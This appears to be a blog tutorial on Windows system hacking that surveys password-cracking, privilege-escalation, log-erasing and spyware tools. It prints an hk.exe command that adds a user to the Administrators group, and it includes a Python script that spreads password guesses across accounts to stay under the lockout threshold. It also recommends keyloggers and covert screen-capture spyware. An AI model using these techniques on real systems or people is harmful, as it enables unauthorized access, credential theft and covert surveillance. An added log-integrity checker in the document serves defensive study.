Password Cracking, Escalating Privileges and Hiding Files

There are various aspects of system hacking. As we recall from "Footprinting, Gathering Network and Host Information: Scanning and Enumeration", the system hacking cycle consists of six steps. The first step, enumeration, was discussed in the previous topic. This TechTrick article covers the five remaining steps:

  • Cracking passwords
  • Escalating privileges
  • Executing applications
  • Hiding files
  • Covering tracks

The Simplest Way to Get a Password

Many hacking attempts start with getting a password to a target system. Passwords are the key piece of information needed to access a system, and users often select passwords that are easy to guess. Many reuse passwords or choose something simple, such as a pet's name, to help them remember it. Because of this human factor, most password guessing succeeds if some information is known about the target. Information gathering and reconnaissance turn up exactly the details that help a hacker guess a user's password.


Once a password is guessed or cracked, it becomes the launching point for escalating privileges, executing applications, hiding files, and covering tracks. If guessing a password fails, passwords may be cracked manually or with automated tools using a dictionary or brute-force method.


Types of Passwords

Several types of passwords are used to provide access to systems. The characters that form a password fall into one of these categories, and the category fixes the key space an attacker has to search:

  • Passwords that contain only letters.
  • Passwords that contain only numbers.
  • Passwords that contain only special characters.
  • Passwords that contain letters and numbers.
  • Passwords that contain letters and special characters.
  • Passwords that contain special characters and numbers.
  • Passwords that contain letters, special characters and numbers.

Administrator Password Guessing

  • Assuming that NetBIOS over TCP (port 139) is open, the most effective method of breaking into NT/2000 is password guessing.
  • Attempt to connect to an enumerated share (IPC$ or C$) and try username/password pairs.
  • The default ADMIN$, C$ and %SystemDrive% shares are a good starting point.

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access? With LM/NTLM authentication what crosses the wire is a challenge/response pair rather than the password itself, so a capture is either cracked offline (L0phtCrack, below) or relayed to another server while the victim's session is live (SMBRelay, below).


Cracking a Password

Manual password cracking involves attempting to log on with different passwords. The hacker follows these steps:

  • Find a valid user account (such as Administrator or Guest).
  • Create a list of possible passwords.
  • Rank the passwords from high to low probability.
  • Key in each password.
  • Try again until a successful password is found.

A hacker can also write a script that tries each password in a list. This is still considered manual cracking; it is time consuming and, against an account protected by a lockout policy, not usually effective.
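The procedure above, together with the share-guessing approach from the Administrator Password Guessing section, as an added Python example that is not part of the original article: candidates are built from reconnaissance facts, ranked, and tried in an order that keeps every account under the lockout threshold. The target is a constructed stand-in for an IPC$/C$ logon with a Windows-style lockout policy, so the script runs offline and touches no network; the recon facts, usernames and passwords are made up for illustration.

```python
"""Ranked, lockout-aware password guessing (added example, not from the article)."""
from dataclasses import dataclass, field

# Constructed reconnaissance results for the target host (illustrative only).
RECON = {
    "users": ["administrator", "akash"],
    "pet": "Rex",
    "company": "techtrick",
    "years": ["2016", "2017"],
}
COMMON_DEFAULTS = ["password", "admin", "letmein", "welcome"]


def build_candidates(recon, common=COMMON_DEFAULTS):
    """Return a deduplicated guess list, ranked from most to least likely.

    Tier 1: recon-derived words and common defaults, in both casings.
    Tier 2: the same words with the year/digit suffixes users typically append.
    """
    words = [recon["pet"], recon["company"]] + recon["users"] + list(common)
    seen, ranked = set(), []

    def add(pw):
        if pw not in seen:
            seen.add(pw)
            ranked.append(pw)

    for w in words:
        add(w.lower())
        add(w.capitalize())
    for w in words:
        for suffix in recon["years"] + ["1", "123", "!"]:
            add(w.capitalize() + suffix)
    return ranked


@dataclass
class LockoutTarget:
    """Constructed stand-in for an IPC$/C$ logon that enforces account lockout."""
    passwords: dict                   # username -> real password (made up)
    threshold: int = 5                # bad attempts before the account locks
    failures: dict = field(default_factory=dict)
    locked: set = field(default_factory=set)

    def logon(self, user, password):
        if user in self.locked:
            return "locked"
        if self.passwords.get(user) == password:
            self.failures[user] = 0   # Windows resets the bad-password count on success
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return "denied"


def guess(target, users, candidates, budget):
    """Try candidates in password-major order: every account sees guess N before
    any account sees guess N+1, and no account receives more than `budget`
    failures.  Keep `budget` below the lockout threshold (readable on the target
    with `net accounts`), otherwise guessing turns into a denial of service."""
    found, attempts = {}, {u: 0 for u in users}
    for pw in candidates:
        for user in users:
            if user in found or attempts[user] >= budget:
                continue
            attempts[user] += 1
            if target.logon(user, pw) == "ok":
                found[user] = pw
        if all(u in found or attempts[u] >= budget for u in users):
            break
    return found, attempts


if __name__ == "__main__":
    cands = build_candidates(RECON)
    strict = LockoutTarget({"administrator": "Rex2017", "akash": "Welcome"}, threshold=5)
    print(guess(strict, RECON["users"], cands, budget=4))   # nothing found, nothing locked
    lax = LockoutTarget({"administrator": "Rex2017", "akash": "Welcome"}, threshold=50)
    print(guess(lax, RECON["users"], cands, budget=30))     # both passwords recovered
```

The password-major loop is the point: with a budget of four guesses against a threshold of five, the run finds nothing but leaves every account usable for a later window; raising the budget past the threshold against the same target simply locks the accounts out.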


Hacking Tool: L0phtCrack

L0phtCrack is a password auditing and recovery package originally distributed by @stake, which was later acquired by Symantec. It performs Server Message Block (SMB) packet captures on the local network segment and records the LM/NTLM challenge/response of individual login sessions. L0phtCrack contains dictionary, brute-force, and hybrid attack capabilities. Symantec has stopped development of the L0phtCrack tool, but it can still be found on the Internet.

With the L0phtCrack password cracking engine, anyone who can sniff the wire for an extended period is almost guaranteed to obtain Administrator status in a matter of days.



Hacking Tool: KerbCrack

KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker recovers the passwords from the capture file using a brute-force or a dictionary attack.


Hacking Tool: Legion

Legion automates the password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool.


Hacking Tool: NTInfoScan

NTInfoScan is a security scanner for NT 4.0. This vulnerability scanner produces an HTML-based report of security issues found on the target system and other information.


Hacking Tool: LC5

LC5 is another good password cracking tool. LC5 is version 5 of L0phtCrack itself, and is the natural successor to the earlier releases described above.


Privilege Escalation

If an attacker gains access to the network using a non-admin user account, the next step is to gain privileges equal to those of an administrator.

This is called privilege escalation.


Hacking Tool: GetAdmin

1. GetAdmin.exe is a small program that adds a user to the local Administrators group.

2. It uses a low-level NT kernel routine to set a global flag that allows access to any running process.

3. You need to log on to the server console to execute the program.

4. GetAdmin.exe is run from the command line or from a browser.

5. This only works with NT 4.0 up to Service Pack 3; Microsoft's post-SP3 hotfix closes the hole.


Hacking Tool: hk.exe

1. The hk.exe utility exploits a Local Procedure Call (LPC) port flaw in NT 4.0 that lets a caller impersonate a more privileged LPC client, so a command can be run with the privileges of a system service.

2. A non-admin user can be escalated to the Administrators group using hk.exe. The first command below fails for an ordinary user; the same command run through hk succeeds (akash is the example user):

  c:\>net localgroup administrators akash /add
  Access denied

  c:\>hk net localgroup administrators akash /add
  pid & tid are: 47 - 48
  NtImpersonateClientOfPort succeeded


Types of Password Attacks

  • Dictionary attack
  • Brute force attack
  • Hybrid attack
  • Social engineering
  • Shoulder surfing
  • Dumpster diving

Hacking Tool: SMBGrind

SMBGrind increases the speed of L0phtCrack sessions on sniffer dumps by removing duplicates and providing a facility to target specific users without having to edit the dump files manually.


Hacking Tool: SMBDie

SMBDie crashes computers running Windows NT/2000/XP by sending a specially crafted SMB request. It is a denial of service, not a way in.


Hacking Tool: NBTDeputy

NBTDeputy registers a NetBIOS computer name on the network and then answers NetBT name-query requests for it.

NBTDeputy thus resolves a NetBIOS computer name to an IP address of the attacker's choosing; it is similar to proxy ARP.

This tool works well with SMBRelay.

For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET Server machine whenever the logged-on users access "My Network Places".


Hacking Tool: John the Ripper

John the Ripper is a free command-line tool that cracks both Unix and NT password hashes, and it is extremely fast.

When it cracks LM hashes, the recovered passwords come out in upper case only, because the LM algorithm upper-cases the password before hashing; the real mixed-case password must then be confirmed against the NT hash. NT (NTLM) hashes are case sensitive and yield the real password directly.


Hacking Tool: Win32CreateLocalAdminUser

Win32CreateLocalAdminUser is a program that creates a new user with the username and password X and adds the user to the local Administrators group. It is part of the Metasploit Project and can be launched from the Metasploit Framework on Windows.


Hacking Tool: Offline NT Password Resetter

Offline NT Password Resetter is a method of resetting the Administrator account's password when the system is not booted into Windows. The most common method is to boot from a Linux CD, mount the NTFS partition, whose ACLs are not enforced outside Windows, and overwrite the password hash in the SAM. Note that this resets rather than recovers the password, so the change is obvious to the legitimate owner at the next logon.


Hacking Tool: ophcrack

ophcrack cracks LM and NTLM hashes using precomputed rainbow tables; download and install it from http://ophcrack.sourceforge.net


Hacking Tool : Keystroke Loggers

1. If all other attempts to obtain domain privileges fail, a keystroke logger is the solution.

2. Keystroke loggers are stealth software that sits between the keyboard hardware and the operating system, so that it can record every keystroke.

3. There are two types of keystroke loggers:

  • Software based
  • Hardware based


Hacking Tool: WinZapper

1. WinZapper is a tool that an attacker can use to erase event records selectively from the Security log in Windows 2000.

2. To use the program, the attacker runs winzapper.exe, marks the event records to be deleted and then presses Delete events.

3. To sum up: after an attacker has gained Administrator access to the system, one simply cannot trust the Security log!
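A check a defender would want after reading the conclusion above, as an added Python example that is not part of the article or of WinZapper: two heuristics run over a constructed CSV export of a Security log. The first looks for the "audit log cleared" event, which wholesale clearing generates and selective deletion does not; the second looks for gaps in the record numbers that selective deletion leaves behind. The column names, the sample records, and the assumption that whoever removed records did not renumber the survivors are all mine.

```python
"""Integrity heuristics for an exported Windows Security log (added example,
not from the article).  Runs over constructed sample records, not a real log."""
import csv
import io

# Event IDs written when the audit log is cleared: 517 on NT/2000/XP/2003,
# 1102 on Vista and later.  Selective deletion never produces them, which is
# why the record-number heuristic below is needed as well.
CLEARED_IDS = {"517", "1102"}

# Constructed export (record number, event ID, account, message).  Two records,
# 1005 and 1006, have been removed without renumbering the survivors.
SAMPLE_LOG = """\
record,event_id,user,message
1001,528,akash,Successful Logon
1002,529,akash,Logon Failure
1003,529,akash,Logon Failure
1004,528,akash,Successful Logon
1007,592,akash,A new process has been created
1008,528,Administrator,Successful Logon
"""

# Constructed export of a log that was simply cleared instead.
CLEARED_LOG = """\
record,event_id,user,message
1,517,Administrator,The audit log was cleared
2,528,Administrator,Successful Logon
"""


def parse(text):
    return list(csv.DictReader(io.StringIO(text)))


def find_gaps(records):
    """Ranges of missing record numbers.  Assumes the export preserves the log's
    own monotonically increasing record number and that whoever removed records
    did not renumber the rest (assumption, not a property of any named tool)."""
    nums = sorted(int(r["record"]) for r in records)
    return [(lo + 1, hi - 1) for lo, hi in zip(nums, nums[1:]) if hi - lo > 1]


def cleared_events(records):
    """Record numbers of 'audit log cleared' events."""
    return [int(r["record"]) for r in records if r["event_id"] in CLEARED_IDS]


def audit(text):
    """Summarise both heuristics.  'trustworthy' is False on any finding; True
    only means nothing obvious was found, which is why events should be
    forwarded off the host as they are written rather than trusted in place."""
    records = parse(text)
    gaps, cleared = find_gaps(records), cleared_events(records)
    return {"gaps": gaps, "cleared_at": cleared, "trustworthy": not gaps and not cleared}


if __name__ == "__main__":
    print(audit(SAMPLE_LOG))   # gap 1005-1006 found -> not trustworthy
    print(audit(CLEARED_LOG))  # clear event at record 1 -> not trustworthy
```

Neither heuristic proves a log is clean, which is the article's own conclusion; the durable fix is to ship events to a collector the local Administrator cannot reach, so that a zapped local log disagrees with a copy the attacker never touched.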


Hacking Tool: Hardware Key Logger(www.keyghost.com)

1. The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

2. It keeps a record of all keystrokes typed on the keyboard. The recording process is totally transparent to the end user.


Spyware: Spector (www.spector.com)

1. Spector is spyware, and it will record everything anyone does on the Internet.

2. Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With Spector you will be able to see exactly what your surveillance targets have been doing online and offline.

3. Spector works by taking a snapshot of whatever is on the computer screen and saving it in a hidden location on the computer's hard drive.



I hope you enjoyed this article.



About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email.

akashchugh1994@gmail.com

Who Should Read TechTrick?

All the tricks and tips that TechTrick provides are for educational purposes only. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsible for any issues caused by the information provided here. So, try yourself and see the results. You are not losing anything by trying... We are humans; mistakes are quite natural. Here on TechTrick we also have many mistakes.